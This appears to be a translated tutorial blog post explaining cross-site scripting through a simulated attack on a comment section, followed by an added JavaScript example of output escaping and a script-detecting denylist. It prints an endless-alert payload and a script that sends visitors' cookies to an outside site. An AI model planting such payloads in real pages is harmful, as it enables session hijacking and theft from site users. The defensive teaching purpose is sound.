XSS (cross-site scripting) vulnerability: explanation and protection
What is "XSS cross-site scripting"? Baidu Baike (the Baidu encyclopedia) says this: Cross-Site Scripting (XSS) is not the abbreviation of Cascading Style Sheets (CSS); therefore, cross-site scripting attacks are abbreviated as XSS. A malicious attacker inserts malicious HTML code into a web page. When a user browses this page, the HTML code embedded in the page is executed, so as to achieve the special purpose of the malicious attack.
Baidu Baike explains it well, but I still did not understand it, so now I want to explain it in plain language. If you still do not understand after that, go easy on me!
First, look at the name "cross-site scripting attack": it tells you plainly that what the attack executes is a script. I believe many people have run into this during development: you write an article whose content contains a script fragment, say an alert, and when you open the article to read it, the alert pops up. Our intention was for it to be displayed like normal text, but instead it ran.
So, as I said, many people have been hit by this. Plenty of people ask online how to fix it. Let's set the fix aside for a moment; first some bad news: you have already been hit. This is the "cross-site scripting vulnerability".
Broadly speaking, if your system accepts content and stores it exactly as submitted, your system has this vulnerability: if I submit a malicious script, your system will still accept it, and that gives criminals their chance.
Now I will simulate the attack process.
Suppose you have a website at www.blog.com, and it has a cross-site scripting vulnerability.
I also have a website, www.gaopohuai.com, which also has a cross-site vulnerability; but my site only receives what is sent to it and does not display it.
I will play the criminal here.
One day, browsing the Internet, I happen upon your website. Well, well: lots of articles, and lots of comments. I decide to join in and find an article to comment on.
I write a comment like this:
<script type="text/javascript">while(true){alert(1);}</script>
Guess what happens when someone visits this article again?
Let me write another one:
<script type="text/javascript">window.open("http://www.gaopohuai.com?cookie="+document.cookie);</script>
Guess what happens when other users open this article? Yes: their cookie information is sent to me, and that can include all kinds of valuable information.
By now you should understand how this vulnerability works.
Now let's talk about how to prevent it.
In my opinion, there are at least two ways to solve this problem:
1. Do not let it be submitted.
2. Do not let it execute when it is displayed.
The idea is simple. First, I do not allow you to submit content containing malicious scripts; second, if you do get it submitted, I do not allow it to execute when it is displayed. Solving either point solves the problem, and doing both is better.
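As an added example, not code from the original post, here are the two defences listed above applied to a blog comment in JavaScript: a naive input check for step 1 and HTML escaping on output for step 2, shown next to the unsafe rendering the post describes. It assumes comments are rendered into an HTML string; the function names and sample comments are my own.

```javascript
// Added example, not from the original post: the two defences the post
// lists, applied to a comment. All names here are assumed, not from the post.

// Step 2, escape on output: the characters HTML uses for markup become
// entities, so a stored comment is shown as text and never parsed as a tag.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Step 1, reject on input: a naive pattern check that catches the two
// comments shown in the post. A denylist like this misses other tags and
// encodings, so treat it as a first filter; escaping on output is the part
// that actually keeps a stored script from running.
function looksLikeScript(text) {
  return /<\s*script\b|on\w+\s*=|javascript:/i.test(text);
}

// Vulnerable rendering, as in the post: the comment goes into the page as-is.
function renderCommentUnsafe(comment) {
  return '<div class="comment">' + comment + "</div>";
}

// Hardened rendering: the same template, but the comment is escaped first.
function renderComment(comment) {
  return '<div class="comment">' + escapeHtml(comment) + "</div>";
}

// Full handling of a submitted comment: reject at step 1, otherwise store it
// and render it with step 2. Returns { accepted, html }.
function handleSubmission(comment) {
  if (looksLikeScript(comment)) return { accepted: false, html: null };
  return { accepted: true, html: renderComment(comment) };
}

// Constructed sample comments: the two payloads from the post and a harmless one.
const SAMPLE_COMMENTS = [
  '<script type="text/javascript">while(true){alert(1);}</script>',
  '<script type="text/javascript">window.open("http://www.gaopohuai.com?cookie="+document.cookie);</script>',
  "Nice article, thanks! 1 < 2 && 3 > 2",
];

for (const c of SAMPLE_COMMENTS) {
  console.log("unsafe:   " + renderCommentUnsafe(c));
  console.log("hardened: " + renderComment(c));
  console.log("submit:   " + JSON.stringify(handleSubmission(c)));
}
```

In the hardened output both script comments appear as literal text beginning with `&lt;script`, while the harmless comment keeps its `<` and `&` characters intact after decoding in the browser.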